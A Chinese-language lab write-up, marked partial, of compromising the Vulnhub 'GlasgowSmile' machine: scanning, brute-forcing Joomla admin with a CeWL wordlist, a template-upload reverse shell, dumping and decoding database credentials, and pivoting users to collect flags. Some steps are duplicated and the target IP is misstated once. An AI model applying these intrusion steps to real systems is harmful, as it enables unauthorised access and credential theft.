Vulnhub之GlasgowSmile靶机测试过程(部分)
GlasgowSmile
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.148 00:0c:29:e1:23:04 1 60 VMware, Inc.
10.1.1.254 00:50:56:ee:66:c6 1 60 VMware, Inc.
利用Kali Linux自带的Netdiscover工具识别目标主机的IP地址为10.1.1.254
NMAP扫描
──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.148 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 05:54 EST
Nmap scan report for 10.1.1.148
Host is up (0.0063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6734481f250ed7b3eabb361122608fa1 (RSA)
| 256 4c8c4565a484e8b1507777a93a960631 (ECDSA)
|_ 256 09e994236097f720cceed6c19bda188e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E1:23:04 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ls
joker.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ steghide extract -sf joker.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ stegseek joker.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.37% (132.6 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ exiftool joker.jpg
ExifTool Version Number : 12.49
File Name : joker.jpg
Directory : .
File Size : 263 kB
File Modification Date/Time : 2023:02:23 05:56:51-05:00
File Access Date/Time : 2023:02:23 05:57:08-05:00
File Inode Change Date/Time : 2023:02:23 05:56:51-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Image Width : 1920
Image Height : 1080
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1920x1080
Megapixels : 2.1
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ nikto -h http://10.1.1.148
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.148
+ Target Hostname: 10.1.1.148
+ Target Port: 80
+ Start Time: 2023-02-23 08:18:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7d, size: 5a7fbb701d4b6, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7889 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-02-23 08:19:12 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ gobuster dir -u http://10.1.1.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.1.1.148
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2023/02/23 08:20:30 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 275]
/.html (Status: 403) [Size: 275]
/index.html (Status: 200) [Size: 125]
/joomla (Status: 301) [Size: 309] [--> http://10.1.1.148/joomla/]
/how_to.txt (Status: 200) [Size: 456]
/.html (Status: 403) [Size: 275]
/.php (Status: 403) [Size: 275]
/server-status (Status: 403) [Size: 275]
Progress: 1098668 / 1102805 (99.62%)
===============================================================
2023/02/23 08:22:06 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ curl http://10.1.1.148/how_to.txt
Hi Rob,
Forgive My Laughter. I Have A Condition
Take care
________ ____ __ ___ _____ ______
(___ ___) / __ \ () ) / __) / ___/ ( __ \
) ) / / \ \ ( (_/ / ( (__ ) (__) )
( ( ( () () ) () ( ) __) ( __/
__ ) ) ( () () ) () /\ \ ( ( ) \ \ _
( (_/ / \ \__/ / ( ( \ \ \ \___ ( ( \ \_))
\___/ \____/ ()_) \_\ \____\ )_) \__/
Rob会不会是用户名?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ dirb http://10.1.1.148
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Feb 23 08:24:09 2023
URL_BASE: http://10.1.1.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.1.1.148/ ----
+ http://10.1.1.148/index.html (CODE:200|SIZE:125)
==> DIRECTORY: http://10.1.1.148/joomla/
+ http://10.1.1.148/server-status (CODE:403|SIZE:275)
---- Entering directory: http://10.1.1.148/joomla/ ----
==> DIRECTORY: http://10.1.1.148/joomla/administrator/
发现了页面:
http://10.1.1.148/joomla/administrator/index.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ wfuzz -u http://10.1.1.148/joomla/cli/?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 2
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.1.1.148/joomla/cli/?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 220560
Filtered Requests: 220560
Requests/sec.: 0
至此均没有啥收获
──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ cewl http://10.1.1.148/joomla/ -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ wc -l dict.txt
165 dict.txt
cewl工具产生密码字典,用burpsuite intruder破解登录密码,假设用户名为joomla,破解出密码为Gotham,登录administrator管理后台
找到Extensions->templates->templates->beez3上传反弹shell。
点击template preview。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [10.1.1.143] from (UNKNOWN) [10.1.1.148] 53102
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
07:56:21 up 3:06, 0 users, load average: 0.00, 0.05, 0.31
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
www-data@glasgowsmile:/var/www/joomla2$ cat configuration.php
cat configuration.php
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'Joker';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'babyjoker';
public $db = 'joomla_db';
MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type | date | name | pswd |
+----+---------+------------+---------+----------------------------------------------+
| 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== |
| 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= |
| 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== |
| 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= |
| 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
| 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.000 sec)
──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d
???AllIHaveAreNegativeThoughts???
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'YmFuZWlzaGVyZQ==' | base64 -d
baneishere
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ssh rob@10.1.1.148
The authenticity of host '10.1.1.148 (10.1.1.148)' can't be established.
ED25519 key fingerprint is SHA256:bVGopxZOACv+Dy/jm+EmAyAQm+YSDTmVK1pVrNUz+P8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.148' (ED25519) to the list of known hosts.
rob@10.1.1.148's password:
Permission denied, please try again.
rob@10.1.1.148's password:
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$ id
uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rob@glasgowsmile:~$
提权
用cyberchef破解,编码格式为ROT13,先用ROT13-bruteforce得到amount=1,从而解码成功:
Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
这样就得到aber的密码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d
???AllIHaveAreNegativeThoughts???
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ echo 'YmFuZWlzaGVyZQ==' | base64 -d
baneishere
┌──(kali㉿kali)-[~/Desktop/Vulnhub/GlasgowSmile]
└─$ ssh rob@10.1.1.148
The authenticity of host '10.1.1.148 (10.1.1.148)' can't be established.
ED25519 key fingerprint is SHA256:bVGopxZOACv+Dy/jm+EmAyAQm+YSDTmVK1pVrNUz+P8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.1.1.148' (ED25519) to the list of known hosts.
rob@10.1.1.148's password:
Permission denied, please try again.
rob@10.1.1.148's password:
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$ id
uid=1000(rob) gid=1000(rob) groups=1000(rob),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
rob@glasgowsmile:~$ ls -alh
total 52K
drwxr-xr-x 3 rob rob 4.0K Jun 16 2020 .
drwxr-xr-x 5 root root 4.0K Jun 15 2020 ..
-rw-r----- 1 rob rob 454 Jun 14 2020 Abnerineedyourhelp
-rw------- 1 rob rob 7 Feb 23 04:50 .bash_history
-rw-r--r-- 1 rob rob 220 Jun 13 2020 .bash_logout
-rw-r--r-- 1 rob rob 3.5K Jun 13 2020 .bashrc
-rw-r----- 1 rob rob 313 Jun 14 2020 howtoberoot
drwxr-xr-x 3 rob rob 4.0K Jun 13 2020 .local
-rw------- 1 rob rob 81 Jun 15 2020 .mysql_history
-rw-r--r-- 1 rob rob 807 Jun 13 2020 .profile
-rw-r--r-- 1 rob rob 66 Jun 15 2020 .selected_editor
-rw-r----- 1 rob rob 38 Jun 13 2020 user.txt
-rw------- 1 rob rob 429 Jun 16 2020 .Xauthority
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
rob@glasgowsmile:~$
rob@glasgowsmile:~$ su - aber
su: user aber does not exist
rob@glasgowsmile:~$ su - abner
Password:
abner@glasgowsmile:~$ id
uid=1001(abner) gid=1001(abner) groups=1001(abner)
abner@glasgowsmile:~$ sudo -l
-bash: sudo: command not found
abner@glasgowsmile:~$ ls -alh
total 44K
drwxr-xr-x 4 abner abner 4.0K Jun 16 2020 .
drwxr-xr-x 5 root root 4.0K Jun 15 2020 ..
-rw------- 1 abner abner 167 Feb 23 04:50 .bash_history
-rw-r--r-- 1 abner abner 220 Jun 14 2020 .bash_logout
-rw-r--r-- 1 abner abner 3.5K Jun 14 2020 .bashrc
-rw-r----- 1 abner abner 565 Jun 16 2020 info.txt
drwxr-xr-x 3 abner abner 4.0K Jun 14 2020 .local
-rw-r--r-- 1 abner abner 807 Jun 14 2020 .profile
drwx------ 2 abner abner 4.0K Jun 15 2020 .ssh
-rw-r----- 1 abner abner 38 Jun 16 2020 user2.txt
-rw------- 1 abner abner 399 Jun 15 2020 .Xauthority
abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
abner@glasgowsmile:~$ cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
成功登陆到abner,试了一些提权方式,都没有可利用的。而/home里还有个penguin不能打开,但查看历史命令发现解压了一个.dear_penguins.zip。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
